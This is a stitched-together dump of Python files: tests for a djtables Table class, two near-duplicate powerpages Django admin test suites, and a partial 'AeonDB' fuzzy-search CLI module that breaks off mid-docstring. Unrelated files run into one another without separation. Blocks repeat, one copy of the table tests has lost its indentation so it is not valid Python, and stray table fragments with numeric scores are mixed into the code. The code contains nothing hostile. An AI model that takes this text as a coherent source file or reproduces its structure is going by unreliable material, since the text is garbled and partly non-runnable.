    {'name': "Raphael", 'weapon': "Sai" }]


# Minimal concrete Table subclass exercised by every test below.
class TestTable(Table):
    name = Column()
    weapon = Column()
def test_kwargs_override_options():
    """Constructor kwargs override Meta options per instance only."""
    m = TestTable._meta.__dict__
    t1 = TestTable(per_page=1)
    t2 = TestTable(per_page=2)
    assert t1._meta.per_page == 1
    assert t2._meta.per_page == 2
    # check that the class meta hasn't been touched.
    assert TestTable._meta.__dict__ == m


def test_request_override_options():
    """Querystring parameters from the request override Meta options."""
    req = HttpRequest()
    req.GET = QueryDict(
        "order_by=name&per_page=3",
        encoding="utf-8")
    t = TestTable(request=req)
    assert t._meta.order_by == "name"
    assert t._meta.per_page == 3
def test_class_exposes_columns_via_meta():
    """Columns are reachable on the class via _meta, in declaration order."""
    c = TestTable._meta.columns
    assert c[0].name == "name"
    assert c[1].name == "weapon"


def test_instance_exposes_columns():
    """Instances expose the same columns directly."""
    c = TestTable().columns
    assert c[0].name == "name"
    assert c[1].name == "weapon"


def test_has_paginator():
    """Table.paginator behaves like a django Paginator."""
    t = TestTable(DATA)
    p = t.paginator
    # p must quack like a django paginator, so check for some common
    # methods to ensure that it's actually a paginator returned.
    assert p.count == len(DATA)
    assert p.num_pages == 1


def test_returns_object_list():
    """Plain (unsortable) data is passed through unchanged."""
    t = TestTable(DATA)
    d = t.object_list
    assert d == DATA


def test_sorts_sortable_object_list():
    """Data exposing order_by() (QuerySet-style) is sorted via that hook."""
    class MockData(object):
        def order_by(self, column):
            return 111
    t = TestTable(MockData(), order_by="name")
    assert t.object_list == 111
def test_returns_rows():
    """Each object is wrapped in row_class, receiving (table, object)."""
    class MockRow(object):
        def __init__(self, table, obj):
            self.table = table
            self.obj = obj
    t = TestTable(DATA, row_class=MockRow)
    for n in range(len(DATA)):
        assert isinstance(t.rows[n], MockRow)
        assert t.rows[n].obj == DATA[n]


def test_returns_rows_on_active_page():
    """rows is limited to the current page (per_page entries)."""
    t = TestTable(DATA, per_page=2)
    assert len(t.rows) == 2


def test_spawns_cells():
    """cell() builds a cell_class instance from (column, row)."""
    class MockCell(object):
        def __init__(self, column, row):
            self.column = column
            self.row = row
    t = TestTable(DATA, cell_class=MockCell)
    c = t.cell(111, 222)
    assert c.column == 111
    assert c.row == 222


def test_accepts_prefix():
    """A prefix kwarg is stored on the table's meta."""
    t = TestTable(prefix="a")
    assert t._meta.prefix == "a"
def test_builds_urls():
req = HttpRequest()
req.GET = QueryDict("a=1", encoding="utf-8")
req.path = "/"
t = TestTable(request=req)
assert t.get_url() == "/?a=1"
assert t.get_url(a=2) == "/?a=2"
# either is valid, since param order is undefined.
assert t.get_url(b=3) in ["/?a=1&b=3", "/?b=3&a=1"] | tests/test_table.py |
from django.http import HttpRequest, QueryDict
from djtables.table import Table
from djtables.column import Column
DATA = [
{'name': "Leonardo", 'weapon': "Katana" },
{'name': "Michelangelo", 'weapon': "Nunchaku"},
{'name': "Donatello", 'weapon': "Bo Staff"},
{'name': "Raphael", 'weapon': "Sai" }]
class TestTable(Table):
name = Column()
weapon = Column()
def test_kwargs_override_options():
m = TestTable._meta.__dict__
t1 = TestTable(per_page=1)
t2 = TestTable(per_page=2)
assert t1._meta.per_page == 1
assert t2._meta.per_page == 2
# check that the class meta hasn't been touched.
assert TestTable._meta.__dict__ == m
def test_request_override_options():
req = HttpRequest()
req.GET = QueryDict(
"order_by=name&per_page=3",
encoding="utf-8")
t = TestTable(request=req)
assert t._meta.order_by == "name"
assert t._meta.per_page == 3
def test_class_exposes_columns_via_meta():
c = TestTable._meta.columns
assert c[0].name == "name"
assert c[1].name == "weapon"
def test_instance_exposes_columns():
c = TestTable().columns
assert c[0].name == "name"
assert c[1].name == "weapon"
def test_has_paginator():
t = TestTable(DATA)
p = t.paginator
# p must quack like a django paginator, so check for some common
# methods to ensure that it's actually a paginator returned.
assert p.count == len(DATA)
assert p.num_pages == 1
def test_returns_object_list():
t = TestTable(DATA)
d = t.object_list
assert d == DATA
def test_sorts_sortable_object_list():
class MockData(object):
def order_by(self, column):
return 111
t = TestTable(MockData(), order_by="name")
assert t.object_list == 111
def test_returns_rows():
class MockRow(object):
def __init__(self, table, obj):
self.table = table
self.obj = obj
t = TestTable(DATA, row_class=MockRow)
for n in range(len(DATA)):
assert isinstance(t.rows[n], MockRow)
assert t.rows[n].obj == DATA[n]
def test_returns_rows_on_active_page():
t = TestTable(DATA, per_page=2)
assert len(t.rows) == 2
def test_spawns_cells():
class MockCell(object):
def __init__(self, column, row):
self.column = column
self.row = row
t = TestTable(DATA, cell_class=MockCell)
c = t.cell(111, 222)
assert c.column == 111
assert c.row == 222
def test_accepts_prefix():
t = TestTable(prefix="a")
assert t._meta.prefix == "a"
def test_builds_urls():
    """get_url() preserves, overrides, and extends querystring params."""
    request = HttpRequest()
    request.GET = QueryDict("a=1", encoding="utf-8")
    request.path = "/"
    table = TestTable(request=request)
    assert table.get_url() == "/?a=1"
    assert table.get_url(a=2) == "/?a=2"
    # either is valid, since param order is undefined.
    assert table.get_url(b=3) in ["/?a=1&b=3", "/?b=3&a=1"]
from __future__ import unicode_literals
from django.test import TestCase
from django.conf import settings
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from powerpages.models import Page
from powerpages.sync import PageFileDumper
from powerpages.admin import website_link, sync_status, save_page
from powerpages.signals import page_edited
from .test_sync import BaseSyncTestCase
class WebsiteLinkTestCase(TestCase):
    """Tests for the ``website_link`` admin helper, which renders a page's
    URL as an anchor with the last path segment shown in bold."""
    maxDiff = None

    def test_no_object(self):
        # No page given -> the helper renders nothing.
        self.assertIsNone(website_link(None))

    def test_empty_url(self):
        # Empty URL: anchor is rendered but with no highlighted segment.
        self.assertEqual(
            website_link(Page(url='')),
            '<a href="" style="font-weight: normal;"> »</a>'
        )

    def test_root_url(self):
        # Site root: the bare slash, nothing to embolden.
        self.assertEqual(
            website_link(Page(url='/')),
            '<a href="/" style="font-weight: normal;">/ »</a>'
        )

    def test_first_level_url(self):
        # A single path segment is wrapped in the bold span.
        self.assertEqual(
            website_link(Page(url='/test/')),
            '<a href="/test/" style="font-weight: normal;">'
            '/<span style="font-weight: bold">test</span>/'
            ' »</a>'
        )

    def test_second_level_url(self):
        # Only the last segment of a nested URL is emboldened.
        self.assertEqual(
            website_link(Page(url='/nested/test/')),
            '<a href="/nested/test/" style="font-weight: normal;">'
            '/nested/<span style="font-weight: bold">test</span>/'
            ' »</a>'
        )

    def test_file(self):
        # File-style URL (no trailing slash) highlights the file name.
        self.assertEqual(
            website_link(Page(url='/robots.txt')),
            '<a href="/robots.txt" style="font-weight: normal;">'
            '/<span style="font-weight: bold">robots.txt</span>'
            ' »</a>'
        )

    def test_nested_file(self):
        # Nested file URL: directory part kept, file name emboldened.
        self.assertEqual(
            website_link(Page(url='/nested/robots.txt')),
            '<a href="/nested/robots.txt" style="font-weight: normal;">'
            '/nested/<span style="font-weight: bold">robots.txt</span>'
            ' »</a>'
        )
class SyncStatusTestCase(BaseSyncTestCase):
    """Tests for the ``sync_status`` admin helper, which reports whether a
    page's database content matches its dump file on disk."""
    maxDiff = None

    def test_no_object(self):
        self.assertIsNone(sync_status(None))

    def test_file_synced(self):
        # Dumped right after creation -> DB and file agree.
        page = Page.objects.create(
            url='/test-page/', template='<h1>Test Page</h1>'
        )
        PageFileDumper(page).save()
        self.assertEqual(
            sync_status(page),
            '<span style="color: green">File is synced</span>'
        )

    def test_file_content_differs(self):
        # DB modified after the dump -> contents diverge.
        page = Page.objects.create(
            url='/test-page/', template='<h1>Test Page</h1>'
        )
        PageFileDumper(page).save()
        page.title = '<NAME>'
        page.save()
        self.assertEqual(
            sync_status(page),
            '<span style="color: orange">File content differs</span>'
        )

    def test_file_is_missing(self):
        # Never dumped -> no file exists on disk.
        page = Page.objects.create(
            url='/test-page/', template='<h1>Test Page</h1>'
        )
        self.assertEqual(
            sync_status(page),
            '<span style="color: red">File is missing</span>'
        )

    def test_file_content_differs_modified_in_admin(self):
        # The dirty flag set by admin edits adds an extra warning line.
        page = Page.objects.create(
            url='/test-page/', template='<h1>Test Page</h1>'
        )
        PageFileDumper(page).save()
        page.title = '<NAME>'
        page.is_dirty = True  # modified in Admin
        page.save()
        self.assertEqual(
            sync_status(page),
            '<span style="color:black; font-weight:bold">'
            'Changed in Admin!</span><br>'
            '<span style="color: orange">File content differs</span>'
        )
class SavePageTestCase(TestCase):
    """Tests for the ``save_page`` admin helper: it persists the page, marks
    it dirty, and emits the ``page_edited`` signal."""
    maxDiff = None

    def setUp(self):
        # Capture the kwargs of the last page_edited emission for asserts.
        def page_edited_test_handler(sender, **kwargs):
            self.page_edited_kwargs = kwargs
        self.page_edited_kwargs = None
        page_edited.connect(
            page_edited_test_handler, dispatch_uid='test_page_edited',
            weak=False
        )

    def tearDown(self):
        # Disconnect the listener so tests stay isolated from each other.
        page_edited.disconnect(dispatch_uid='test_page_edited')
        self.page_edited_kwargs = None

    def test_create_page(self):
        page = Page(url='/test-page/')
        user = User.objects.create_user('admin-user')
        save_page(page=page, user=user, created=True)
        self.assertIsNotNone(page.pk)   # page was persisted
        self.assertTrue(page.is_dirty)  # flagged as edited in Admin
        self.assertDictContainsSubset(
            {'page': page, 'user': user, 'created': True},
            self.page_edited_kwargs
        )

    def test_modify_page(self):
        page = Page.objects.create(url='/test-page/', title='Lorem')
        page.title = 'Ipsum'
        user = User.objects.create_user('admin-user')
        save_page(page=page, user=user, created=False)
        self.assertEqual(Page.objects.get(pk=page.pk).title, 'Ipsum')
        self.assertTrue(page.is_dirty)
        self.assertDictContainsSubset(
            {'page': page, 'user': user, 'created': False},
            self.page_edited_kwargs
        )
class SwitchEditModeViewTestCase(TestCase):
    """End-to-end tests for the ``switch_edit_mode`` view: staff members and
    superusers may toggle the session's WEBSITE_EDIT_MODE flag; everyone
    else is redirected to the login page."""

    maxDiff = None

    def setUp(self):
        self.url = reverse('switch_edit_mode')
        self.staff_member = User.objects.create_user(
            'staff_member', password='<PASSWORD>', is_staff=True
        )
        self.super_user = User.objects.create_user(
            'super_user', password='<PASSWORD>', is_superuser=True
        )
        self.regular_user = User.objects.create_user(
            'regular_user', password='<PASSWORD>'
        )
        Page.objects.create(url='/')
        Page.objects.create(url='/test-page/')

    def _force_edit_mode(self):
        # Pre-set the session flag as if edit mode were already enabled.
        session = self.client.session
        session['WEBSITE_EDIT_MODE'] = True
        session.save()

    def test_enable_edit_mode_staff_member_referrer(self):
        """Staff member toggles edit mode on and returns to the referrer."""
        self.client.login(username='staff_member', password='<PASSWORD>')
        response = self.client.get(self.url, HTTP_REFERER='/test-page/')
        self.assertTrue(self.client.session.get('WEBSITE_EDIT_MODE'))
        self.assertRedirects(response, '/test-page/')

    def test_disable_edit_mode_staff_member_no_referrer(self):
        """Staff member toggles edit mode off; no referrer falls back to /."""
        self.client.login(username='staff_member', password='<PASSWORD>')
        self._force_edit_mode()
        response = self.client.get(self.url)
        self.assertNotIn('WEBSITE_EDIT_MODE', self.client.session)
        self.assertRedirects(response, '/')

    def test_enable_edit_mode_super_user_no_referrer(self):
        """Superuser toggles edit mode on; no referrer falls back to /."""
        self.client.login(username='super_user', password='<PASSWORD>')
        response = self.client.get(self.url)
        self.assertTrue(self.client.session.get('WEBSITE_EDIT_MODE'))
        self.assertRedirects(response, '/')

    def test_disable_edit_mode_super_user_referrer(self):
        """Superuser toggles edit mode off and returns to the referrer."""
        self.client.login(username='super_user', password='<PASSWORD>')
        self._force_edit_mode()
        response = self.client.get(self.url, HTTP_REFERER='/test-page/')
        self.assertNotIn('WEBSITE_EDIT_MODE', self.client.session)
        self.assertRedirects(response, '/test-page/')

    def test_access_forbidden_regular_user(self):
        """A non-staff, non-super user is bounced to the login page."""
        self.client.login(username='regular_user', password='<PASSWORD>')
        response = self.client.get(self.url)
        self.assertRedirects(
            response, '{0}?next={1}'.format(settings.LOGIN_URL, self.url),
            fetch_redirect_response=False
        )

    def test_access_forbidden_anonmous(self):
        """An anonymous visitor is bounced to the login page."""
        response = self.client.get(self.url)
        self.assertRedirects(
            response, '{0}?next={1}'.format(settings.LOGIN_URL, self.url),
            fetch_redirect_response=False
        )
from __future__ import unicode_literals
from django.test import TestCase
from django.conf import settings
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from powerpages.models import Page
from powerpages.sync import PageFileDumper
from powerpages.admin import website_link, sync_status, save_page
from powerpages.signals import page_edited
from .test_sync import BaseSyncTestCase
class WebsiteLinkTestCase(TestCase):
    """Tests for the ``website_link`` admin helper, which renders a page's
    URL as an anchor with the last path segment emphasised."""
    maxDiff = None

    def _check(self, url, expected):
        # Render the link for a bare Page with the given URL and compare
        # the produced markup exactly.
        self.assertEqual(website_link(Page(url=url)), expected)

    def test_no_object(self):
        self.assertIsNone(website_link(None))

    def test_empty_url(self):
        self._check('', '<a href="" style="font-weight: normal;"> »</a>')

    def test_root_url(self):
        self._check('/', '<a href="/" style="font-weight: normal;">/ »</a>')

    def test_first_level_url(self):
        self._check(
            '/test/',
            '<a href="/test/" style="font-weight: normal;">'
            '/<span style="font-weight: bold">test</span>/'
            ' »</a>'
        )

    def test_second_level_url(self):
        self._check(
            '/nested/test/',
            '<a href="/nested/test/" style="font-weight: normal;">'
            '/nested/<span style="font-weight: bold">test</span>/'
            ' »</a>'
        )

    def test_file(self):
        self._check(
            '/robots.txt',
            '<a href="/robots.txt" style="font-weight: normal;">'
            '/<span style="font-weight: bold">robots.txt</span>'
            ' »</a>'
        )

    def test_nested_file(self):
        self._check(
            '/nested/robots.txt',
            '<a href="/nested/robots.txt" style="font-weight: normal;">'
            '/nested/<span style="font-weight: bold">robots.txt</span>'
            ' »</a>'
        )
class SyncStatusTestCase(BaseSyncTestCase):
    """Tests for the ``sync_status`` admin helper, which reports whether a
    page's database state matches its dumped file."""
    maxDiff = None
    def test_no_object(self):
        self.assertIsNone(sync_status(None))
    def test_file_synced(self):
        page = Page.objects.create(
            url='/test-page/', template='<h1>Test Page</h1>'
        )
        # Dump the page to its file so DB and file agree.
        PageFileDumper(page).save()
        self.assertEqual(
            sync_status(page),
            '<span style="color: green">File is synced</span>'
        )
    def test_file_content_differs(self):
        page = Page.objects.create(
            url='/test-page/', template='<h1>Test Page</h1>'
        )
        PageFileDumper(page).save()
        # Change the page after dumping so DB and file diverge.
        page.title = '<NAME>'
        page.save()
        self.assertEqual(
            sync_status(page),
            '<span style="color: orange">File content differs</span>'
        )
    def test_file_is_missing(self):
        # No dump performed, so there is no file at all.
        page = Page.objects.create(
            url='/test-page/', template='<h1>Test Page</h1>'
        )
        self.assertEqual(
            sync_status(page),
            '<span style="color: red">File is missing</span>'
        )
    def test_file_content_differs_modified_in_admin(self):
        page = Page.objects.create(
            url='/test-page/', template='<h1>Test Page</h1>'
        )
        PageFileDumper(page).save()
        page.title = '<NAME>'
        page.is_dirty = True # modified in Admin
        page.save()
        self.assertEqual(
            sync_status(page),
            '<span style="color:black; font-weight:bold">'
            'Changed in Admin!</span><br>'
            '<span style="color: orange">File content differs</span>'
        )
class SavePageTestCase(TestCase):
    """Tests for the ``save_page`` admin helper.

    Verifies that saving persists the page, marks it dirty and emits the
    ``page_edited`` signal with the page, user and created flag.
    """
    maxDiff = None
    def setUp(self):
        # Capture the kwargs of the last ``page_edited`` emission so the
        # tests below can assert on them.
        def page_edited_test_handler(sender, **kwargs):
            self.page_edited_kwargs = kwargs
        self.page_edited_kwargs = None
        page_edited.connect(
            page_edited_test_handler, dispatch_uid='test_page_edited',
            weak=False
        )
    def tearDown(self):
        # Disconnect by uid so other test cases see a clean signal.
        page_edited.disconnect(dispatch_uid='test_page_edited')
        self.page_edited_kwargs = None
    def test_create_page(self):
        page = Page(url='/test-page/')
        user = User.objects.create_user('admin-user')
        save_page(page=page, user=user, created=True)
        self.assertIsNotNone(page.pk)
        self.assertTrue(page.is_dirty)
        self.assertDictContainsSubset(
            {'page': page, 'user': user, 'created': True},
            self.page_edited_kwargs
        )
    def test_modify_page(self):
        page = Page.objects.create(url='/test-page/', title='Lorem')
        page.title = 'Ipsum'
        user = User.objects.create_user('admin-user')
        save_page(page=page, user=user, created=False)
        self.assertEqual(Page.objects.get(pk=page.pk).title, 'Ipsum')
        self.assertTrue(page.is_dirty)
        self.assertDictContainsSubset(
            {'page': page, 'user': user, 'created': False},
            self.page_edited_kwargs
        )
class SwitchEditModeViewTestCase(TestCase):
    """Tests for the ``switch_edit_mode`` view.

    The view toggles the ``WEBSITE_EDIT_MODE`` session flag for staff
    members and superusers, redirecting back to the HTTP referrer (or to
    ``/`` when none was sent); other users are bounced to the login page.
    """
    maxDiff = None
    def setUp(self):
        self.url = reverse('switch_edit_mode')
        # One user per permission level.
        self.staff_member = User.objects.create_user(
            'staff_member', password='<PASSWORD>', is_staff=True
        )
        self.super_user = User.objects.create_user(
            'super_user', password='<PASSWORD>', is_superuser=True
        )
        self.regular_user = User.objects.create_user(
            'regular_user', password='<PASSWORD>'
        )
        Page.objects.create(url='/')
        Page.objects.create(url='/test-page/')
    def test_enable_edit_mode_staff_member_referrer(self):
        self.client.login(username='staff_member', password='<PASSWORD>')
        response = self.client.get(self.url, HTTP_REFERER='/test-page/')
        self.assertTrue(self.client.session.get('WEBSITE_EDIT_MODE'))
        self.assertRedirects(response, '/test-page/')
    def test_disable_edit_mode_staff_member_no_referrer(self):
        self.client.login(username='staff_member', password='<PASSWORD>')
        # Pre-enable edit mode directly in the session store.
        session = self.client.session
        session['WEBSITE_EDIT_MODE'] = True
        session.save()
        response = self.client.get(self.url)
        self.assertNotIn('WEBSITE_EDIT_MODE', self.client.session)
        self.assertRedirects(response, '/')
    def test_enable_edit_mode_super_user_no_referrer(self):
        self.client.login(username='super_user', password='<PASSWORD>')
        response = self.client.get(self.url)
        self.assertTrue(self.client.session.get('WEBSITE_EDIT_MODE'))
        self.assertRedirects(response, '/')
    def test_disable_edit_mode_super_user_referrer(self):
        self.client.login(username='super_user', password='<PASSWORD>')
        session = self.client.session
        session['WEBSITE_EDIT_MODE'] = True
        session.save()
        response = self.client.get(self.url, HTTP_REFERER='/test-page/')
        self.assertNotIn('WEBSITE_EDIT_MODE', self.client.session)
        self.assertRedirects(response, '/test-page/')
    def test_access_forbidden_regular_user(self):
        self.client.login(username='regular_user', password='<PASSWORD>')
        response = self.client.get(self.url)
        self.assertRedirects(
            response, '{0}?next={1}'.format(settings.LOGIN_URL, self.url),
            fetch_redirect_response=False
        )
    def test_access_forbidden_anonmous(self):
        # NOTE(review): "anonmous" is a typo for "anonymous" in the name.
        response = self.client.get(self.url)
        self.assertRedirects(
            response, '{0}?next={1}'.format(settings.LOGIN_URL, self.url),
            fetch_redirect_response=False
            # NOTE(review): trailing "| ... |" below is dataset-dump residue.
        ) | 0.521227 | 0.306947 |
from typing import List, Set, Dict, Tuple
import csv
import os
import json
import time
import datetime
# ---- Type aliases for the persisted structures ----
Table = List[str]  # a table is a list of rows, each row one space-joined string
Index = Dict[str, List[int]]  # term -> ids of the rows containing it
Fuzzy = Dict[str, List[str]]  # term (or bigram) -> related terms
# ---- On-disk layout; %s is the table name.
# NOTE(review): paths are hard-coded for Windows -- confirm before porting.
ROOT_PATH = "C:/Arcology/AeonDB"
TABLE_DIR = "C:/Arcology/AeonDB/%s"
TABLE_PATH = "C:/Arcology/AeonDB/%s/table.txt"
INDEX_PATH = "C:/Arcology/AeonDB/%s/index.txt"
FUZZY_PATH = "C:/Arcology/AeonDB/%s/fuzzy.txt"
FUZZY2_PATH = "C:/Arcology/AeonDB/%s/fuzzy2.txt"
# ---- In-memory caches, keyed by table name ----
g_tables: Dict[str, Table] = dict()
g_indices: Dict[str, Index] = dict()
g_fuzzyDict: Dict[str, Fuzzy] = dict()
g_fuzzyDict2: Dict[str, Fuzzy] = dict()
def readTable(tableName: str) -> Table:
    """Load a table's rows from its JSON file under the AeonDB root.

    Raises OSError if the file is missing, json.JSONDecodeError if corrupt.
    """
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    # Context managers close the handles deterministically; the originals
    # left every file open until garbage collection.
    with open(TABLE_PATH % tableName) as tableFile:
        return json.load(tableFile)
def writeTable(tableName: str, table: Table) -> None:
    """Persist *table* as JSON under the AeonDB root."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(TABLE_PATH % tableName, 'w+') as tableFile:
        json.dump(table, tableFile)
    return None
def readIndex(tableName: str) -> Index:
    """Load a table's inverted index (term -> row ids) from disk."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(INDEX_PATH % tableName) as indexFile:
        return json.load(indexFile)
def writeIndex(tableName: str, index: Index) -> None:
    """Persist a table's inverted index as JSON."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(INDEX_PATH % tableName, 'w+') as indexFile:
        json.dump(index, indexFile)
    return None
def readFuzzy(tableName: str) -> Fuzzy:
    """Load the term -> related-terms map from disk."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(FUZZY_PATH % tableName) as fuzzyFile:
        return json.load(fuzzyFile)
def writeFuzzy(tableName: str, fuzzy: Fuzzy) -> None:
    """Persist the term -> related-terms map as JSON."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(FUZZY_PATH % tableName, 'w+') as fuzzyFile:
        json.dump(fuzzy, fuzzyFile)
    return None
def readFuzzy2(tableName: str) -> Fuzzy:
    """Load the bigram -> terms map from disk."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(FUZZY2_PATH % tableName) as fuzzyFile:
        return json.load(fuzzyFile)
def writeFuzzy2(tableName: str, fuzzy: Fuzzy) -> None:
    """Persist the bigram -> terms map as JSON."""
    os.makedirs(TABLE_DIR % tableName, exist_ok=True)
    with open(FUZZY2_PATH % tableName, 'w+') as fuzzyFile:
        json.dump(fuzzy, fuzzyFile)
    return None
def listTables() -> List[str]:
    """Return the names of all table directories under the AeonDB root.

    Creates the root directory first so a fresh install yields [].
    """
    os.makedirs(ROOT_PATH, exist_ok=True)
    return os.listdir(ROOT_PATH)
def timestamp() -> str:
    """Current local time formatted as MM/DD/YYYY HH:MM:SS (for log lines)."""
    now = datetime.datetime.fromtimestamp(time.time())
    return now.strftime("%m/%d/%Y %H:%M:%S")
# Usage strings shown by printHelp(), keyed by lowercased command name.
g_cmdHelpMap = {
    "createtable" : "createTable {tableDesc}",
    "getrows" : "getRows {tableName} {key} {count}",
    "importtable" : "importTable {tableName} {CSV filespec}",
    "listtables" : "listTables",
    "indextable" : "indexTable {tableName}",
    "find" : "find {tableName} {term1 term2 term3...}",
    "fuzzysearch" : "fuzzySearch {tableName} {term1 term2 term3...}",
    "quit" : "quit"
}
def printHelp() -> None:
    """Print the usage line of every known command, one per line."""
    for usage in g_cmdHelpMap.values():
        print(usage)
    return
def toBigrams(s: str) -> Set[str]:
    """Return the set of character bigrams of *s*.

    Strings shorter than two characters yield {s} itself, so the result
    is never empty.
    """
    if len(s) < 2:
        return {s}
    return {s[i:i + 2] for i in range(len(s) - 1)}
def dicesCoefficient(a: Set[str], b: Set[str]) -> float:
    """Sorensen-Dice similarity of two bigram sets: 2*|a&b| / (|a|+|b|)."""
    overlap = len(a & b)
    return 2.0 * overlap / (len(a) + len(b))
# Characters preprocess() treats as term separators: ASCII punctuation
# (minus whitespace) and the decimal digits -- exactly the set the
# original 44 chained .replace() calls covered.
_SEPARATORS = "~`!@#$%^&*()-_+={}[]|\\;:\"'<>,./?1234567890"
_SEPARATOR_TABLE = str.maketrans({ch: " " for ch in _SEPARATORS})
def preprocess(s: str) -> str:
    """Replace punctuation and digits in *s* with spaces.

    Single C-level pass via str.translate instead of 44 chained
    .replace() calls; output is byte-identical to the original.
    """
    return s.translate(_SEPARATOR_TABLE)
def createIndex(table: Table) -> Tuple[Index, Fuzzy, Fuzzy]:
    """Build the inverted index and fuzzy-match tables for *table*.

    Returns (index, fuzzy1, fuzzy2) where:
      * index  maps each term to the ids of the rows containing it,
      * fuzzy1 maps each term to all indexed terms whose bigram Dice
        coefficient with it exceeds 0.6 (including the term itself),
      * fuzzy2 maps each bigram to the terms containing it.
    """
    startTime = time.time()
    index: Index = dict()
    fuzzy1: Fuzzy = dict()
    fuzzy2: Fuzzy = dict()
    # term -> its bigram set; memoised so each term is decomposed once.
    fuzzy3: Dict[str, Set[str]] = dict()
    for rowId in range(len(table)):
        row = table[rowId]
        # Strip punctuation/digits, lowercase, and split into unique terms.
        row = preprocess(row).lower()
        terms = set(row.split())
        if "" in terms:
            terms.remove("")
        for term in terms:
            if term not in index:
                index.update({term: list()})
            rowIds = index.get(term)
            if rowId not in rowIds:
                rowIds.append(rowId)
            if term not in fuzzy3:
                # First occurrence of this term: register its bigrams and
                # link it (in both directions) with every similar term.
                atLeastOneBigram = set()
                bigrams = toBigrams(term)
                fuzzy3.update({term: bigrams})
                for bigram in bigrams:
                    if bigram not in fuzzy2:
                        fuzzy2.update({bigram: list()})
                    bigramList = fuzzy2.get(bigram)
                    bigramList.append(term)
                    # Candidates: terms sharing at least one bigram.
                    atLeastOneBigram.update(bigramList)
                related = list()
                for term2 in atLeastOneBigram:
                    if term == term2:
                        related.append(term2)
                    elif dicesCoefficient(fuzzy3.get(term), fuzzy3.get(term2)) > 0.6:
                        related.append(term2)
                        # Keep the relation symmetric for the earlier term.
                        fuzzy1.get(term2).append(term)
                fuzzy1.update({term: related})
        print("Indexed row %d of %d." % (rowId, len(table)))
    print("Indexing Time: " + str(time.time() - startTime))
    return index, fuzzy1, fuzzy2
def importCsv(filename: str) -> "Table":
    """Read a CSV file and return its rows as single space-joined strings.

    The first row is assumed to be a header and is dropped; an empty file
    yields [] (the original raised IndexError).  Raises OSError if the
    file cannot be opened.  The return annotation is quoted so the helper
    can also be imported standalone.
    """
    # newline='' is the csv-module recommended open mode; the context
    # manager closes the handle (the original leaked it).
    with open(filename, newline='') as csvFile:
        table = [" ".join(row) for row in csv.reader(csvFile)]
    if table:  # guard: nothing to pop from an empty file
        table.pop(0)
    return table
def expandQuery(term: str, index: Index, fuzzy: Fuzzy, fuzzy2: Fuzzy) -> Set[int]:
    """Return the row ids matching *term* or any term fuzzily related to it.

    A term already in *fuzzy* uses its precomputed related-terms list;
    otherwise candidates sharing at least one bigram are rescored on the
    fly and kept when their Dice coefficient exceeds 0.6.
    """
    if term in fuzzy:
        relateds = fuzzy.get(term)
    else:
        bigrams = toBigrams(term)
        candidates = set()
        for bigram in bigrams:
            if bigram in fuzzy2:
                candidates.update(fuzzy2.get(bigram))
        relateds = {cand for cand in candidates
                    if dicesCoefficient(toBigrams(cand), bigrams) > 0.6}
    rowIds = set()
    for related in relateds:
        rowIds.update(index.get(related))
    return rowIds
def find(keyTerms: Set[str], table: Table, index: Index, fuzzy: Fuzzy, fuzzy2: Fuzzy, isFuzzy: bool) -> Table:
    """Return the rows of *table* matching every term in *keyTerms*.

    Terms are lowercased and AND-ed together.  With ``isFuzzy`` each term
    is expanded via ``expandQuery``; otherwise any term missing from the
    index short-circuits to no results.
    """
    remaining = {term.lower() for term in keyTerms}
    matches = list()

    def rowsFor(term):
        # Row ids matching a single term, or None if the term is unknown.
        if isFuzzy:
            return expandQuery(term, index, fuzzy, fuzzy2)
        if term in index:
            return set(index.get(term))
        return None

    rowIds = rowsFor(remaining.pop())
    if rowIds is None:
        return matches
    for term in remaining:
        termRows = rowsFor(term)
        if termRows is None:
            return matches
        rowIds.intersection_update(termRows)
    for rowId in rowIds:
        matches.append(table[rowId])
    return matches
def loadAllTables() -> None:
    """Load every table's table/index/fuzzy files into the module caches.

    Each of the four files is loaded independently: a missing or corrupt
    file only skips that cache entry (with a log line), it never aborts
    startup.
    """
    tableNames = listTables()
    for tableName in tableNames:
        print("%s Log.info: Table %s: Backup volume offline. Waiting for new volume." % (timestamp(), tableName))
        try:
            table = readTable(tableName)
            g_tables.update({tableName: table})
            print("%s Log.info: Table %s: Recovered %d rows." % (timestamp(), tableName, len(table)))
        except OSError:
            print("%s Log.info: Table %s: Could not read file." % (timestamp(), tableName))
        except json.JSONDecodeError:
            print("%s Log.info: Table %s: File is corrupted." % (timestamp(), tableName))
        try:
            index = readIndex(tableName)
            g_indices.update({tableName: index})
            print("%s Log.info: Index %s: Recovered %d terms." % (timestamp(), tableName, len(index)))
        except OSError:
            print("%s Log.info: Index %s: Could not read file." % (timestamp(), tableName))
        except json.JSONDecodeError:
            print("%s Log.info: Index %s: File is corrupted." % (timestamp(), tableName))
        try:
            fuzzy = readFuzzy(tableName)
            g_fuzzyDict.update({tableName: fuzzy})
            print("%s Log.info: Fuzzy %s: Recovered %d terms." % (timestamp(), tableName, len(fuzzy)))
        except OSError:
            print("%s Log.info: Fuzzy %s: Could not read file." % (timestamp(), tableName))
        except json.JSONDecodeError:
            print("%s Log.info: Fuzzy %s: File is corrupted." % (timestamp(), tableName))
        try:
            fuzzy2 = readFuzzy2(tableName)
            g_fuzzyDict2.update({tableName: fuzzy2})
            print("%s Log.info: Fuzzy2 %s: Recovered %d terms." % (timestamp(), tableName, len(fuzzy2)))
        except OSError:
            print("%s Log.info: Fuzzy2 %s: Could not read file." % (timestamp(), tableName))
        except json.JSONDecodeError:
            print("%s Log.info: Fuzzy2 %s: File is corrupted." % (timestamp(), tableName))
    print("AeonDB ready. %d tables available." % len(tableNames))
    return None
def prompt() -> List[str]:
    """Read one command line from stdin and return its whitespace-split
    tokens with the command name lowercased.

    Re-prompts until at least one token is entered, so pressing Enter on
    an empty line no longer crashes the REPL with an IndexError.
    """
    while True:
        args = input(" : ").split()
        if args:
            args[0] = args[0].lower()
            return args
def main() -> None:
    """AeonDB interactive command loop.

    Loads every table from disk, then reads commands from stdin until
    "quit".  Commands are dispatched on their lowercased first token;
    under-length commands print their usage line, unknown ones the full
